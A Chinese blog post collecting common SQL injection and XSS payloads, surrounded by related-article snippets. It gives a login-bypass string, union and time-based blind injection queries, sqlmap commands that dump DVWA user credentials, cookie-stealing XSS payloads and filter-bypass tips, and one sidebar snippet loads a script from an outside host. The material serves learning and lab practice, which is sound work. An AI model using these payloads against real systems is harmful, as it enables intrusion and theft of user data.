常见sql注入语句和xss注入语句

已于 2023-04-17 16:17:09 修改
阅读量2.8k 收藏 10
点赞数
分类专栏: 安全 文章标签: sql xss 数据库
于 2021-12-22 16:21:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527658/article/details/121743123
版权

一、sql注入

前提:对用户输入的用户和密码未做任何校验以及处理

可绕过登录的万能语句  "1' or '1'='1"  (一般登录用户和密码都是字符串类型)

1.order by 1,2,3,4... 判断表的字段个数,一般占位的个数超过字段数时,页面会报错;下图报错为未知列5,一般此处可判断字段的个数为4;可通过占位数字是否在页面有回显,如果2,3回显的话,我们可替换占位为database()获取当前库名,user()为当前用户(version()版本等)

2.然后通过mysql的元数据表对数据库中所有表进行查看,猜字段,判断用户表

select table_name from information_schema.tables where table_schema='database()'; 

table_schema字段对应的是库名值

.......

3.若存在类似user的用户表,可直接查看用户信息

4.通过sqlmap来检测注入漏洞

简单的sqlmap -u "http://baidu.com"

sqlmap -r  数据包文件.txt (此处数据包可通过burpsuite抓取并写入txt文件)

python sqlmap.py -r .\1111.txt --batch --dbs --tables
python sqlmap.py -r .\1111.txt --batch -D dvwa --tables
python sqlmap.py -r .\1111.txt --batch -D dvwa -T users --column
python sqlmap.py -r .\1111.txt --batch -D dvwa -T users -C username,password --dump
python sqlmap.py -r .\1111.txt --batch --dbs --tables --technique BT

--dump 备份

--technique 表示采用的注入技术,默认DBUSTQ六种注入手段

5.sleep判断注入

select * from users where id =1 and if (user()="root@localhost",sleep(5),null);如果存在默认用户,则查询结果的时间会延时5秒 

select * from users where id =1 and if (substr(users(),1,1)="r",sleep(5),null);逐字判断

 ....union注入的方式与前面有一点点区别

二、xss

常见的payload  <img scr=a οnerrοr=confirm(124)>    可换成confirm(document.cookie)

<a href=javascript:alert(124)>

<script>alert(124)</script>

confirm和alert可互换

学会闭包前端源码的<、>符号;

检查工具 xxstrike、xsser

部分防护手段都是通过前端校验对特殊符号进行实体化 转译、正则排除等;可直接通过burpsuite抓包改包放包 去绕过前端校验

如果后台做了校验,可以尝试大小写、双写标签绕过

实测过web应用,大部分xss都是“间接引用”触发;输入payload直接触发的情况比较少见

常用的web漏洞工具 awvs(推荐)、appscan(比较常规性)、netsparker、nitko、owasp、xray等

补充:可通过搭建vulnhub官网发布的漏洞环境进行漏洞复现

快速访问github连接

床前明月光,疑似地下霜
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入语句和方法总结
叮当大猫猫
09-29 6639
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
XSS注入常用语句(整理)
weixin_34211761的博客
09-16 3368
<script>alert('hello,gaga!');</script> //经典语句,哈哈! >"'><img src="javascript.:alert('XSS')">>"'><script>alert('XSS')</script><table background='javascript.:...
2024年软件测试最全渗透测试-SQL注入检测_sql注入 在线检测(1),看这篇足矣了
最新发布
2401_84765537的博客
05-09 763
而当我们使用 用户名‘:–的时候,!这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且。: SQL注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情下操作数据库。
sql手工注入实战
mulincong的博客
05-30 2221
sql手工注入封神台靶场
xss跨站脚本***大全
weixin_34331102的博客
03-20 447
(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无...
SQL注入语句
热门推荐
大头的博客
07-25 3万+
一、SQL注入语句 账号:Admin 密码:123456 登录验证语句为select * from 表名 where UserName = '用户名' and UserPassword = '用户密码";的系统可通过以下注入方式可能可绕过密码登录进入系统。 1、 Admin' or '1'='1 123(任意密码) 注释:形成一个恒为真的条件,是SQL查询判断失败 2、 Admi...
一文搞懂什么是SQL注入---SQL注入详解
liuhyusb的博客
09-08 387
一文搞懂什么是SQL注入---SQL注入详解
sql注入xss攻击常见形式和解决方法
01-01
1. 使用 Prepared Statement:使用 Prepared Statement 可以防止 SQL 注入攻击,因为它可以将 SQL 语句和参数分离,避免了恶意攻击者的攻击。 2. 使用 addslashes 函数:addslashes 函数可以将特殊字符转义,使得...
扫描sql注入xss攻击的牛b工具
11-02
**SQL注入**是一种攻击方式,通过输入恶意的SQL语句,攻击者可以获取、修改、删除数据库中的敏感数据,甚至完全控制数据库服务器。SQL注入漏洞通常源于应用程序没有对用户提供的输入进行充分的验证和转义。例如,一...
SQL注入XSS跨站攻击安全规范1
08-08
- 使用参数化查询或预编译的SQL语句,如PreparedStatement在Java或SqlCommand在C#,将用户输入隔离,防止与SQL命令直接拼接。 - 对用户输入进行过滤和转义,移除或转换可能有害的字符。 - 限制数据库权限,确保应用...
PHP中防止SQL注入攻击和XSS攻击的两个简单方法
12-17
mysql_real_escape_string() 所以得SQL语句如果有类似这样的写法:”select * from cdr where src =”.$userId; 都要改成 $userId=mysql_real_escape_string($userId) 所有有打印的语句如echo,print等 在打印前都要...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
xss攻击和sql注入
03-19
在网络安全领域,XSS(Cross-Site Scripting)攻击和SQL Injection(结构化查询语言注入)是两种常见的安全威胁,对网站和应用程序的安全性构成重大挑战。本文将深入探讨这两种攻击方式,以及如何通过编程手段进行...
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1825
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
SQL注入XSS攻击
neverSaynever_的博客
02-20 1628
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
常用sql注入语句
hey
08-19 1万+
首先,看看SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上; Out-of-band:数据通过不同于SQL代码注入的方法获得(譬如通过邮件等) 推理:这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。 不论是...
’or 1=1# 初入SQL注入的万能语句
weixin_41607190的博客
09-23 3万+
噢,终于知道CTF里面的那些SQL注入题里面,每题基本都有 id=1’ 这个东西,然后就是一串语句后面加个 # 。 现在终于理解了。至于这个东西为什么叫万能语句,继续看吧。 在介绍之前,先介绍一下我们一般的登陆过程: 输入用户名:“username” 输入密码:“password” 但我们输入完了以后是怎么登陆进去的呢?每个程序都会有一些验证机制。说一种简单的,比如下面这种代码: sql=&amp;amp;am...
sql注入之(登录框绕过)
qq_42383069的博客
05-06 2万+
sql注入之(登录框绕过) 原理说明: Mysql数据库查询语句: 一般的登录框sql语句如下: select name.passwd from users where username=‘name’ and password=‘pwd’; 分析: 如果我们输入的是正确的用户名与密码,肯定就可以登陆进去,错的就不行了。但是这个验证机制可以通过SQL语句来构造一个特殊的“字符串”通过验证。 比如我们...
order by 1 与 order by 列名
苦苦的潜行者
12-11 8005
常见sql语句中order by 1或者order by 2,有时候很莫名其妙.其实1表示第一个栏位,2表示第二栏位 依此类推 当表中只有2个栏位时,ORDER BY 3就会出错,这个跟order by 列名没有什么区别,不过在特殊情况下还是很有用的.
sql注入漏洞和xss漏洞的相同点与不同点
05-19
SQL注入漏洞和XSS漏洞都是常见的Web漏洞,它们的相同点和不同点如下: 相同点: 1. 都属于Web应用的安全漏洞,都可能导致恶意攻击者利用漏洞获取敏感信息、执行恶意代码等危害。 2. 都可以通过输入一些恶意的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值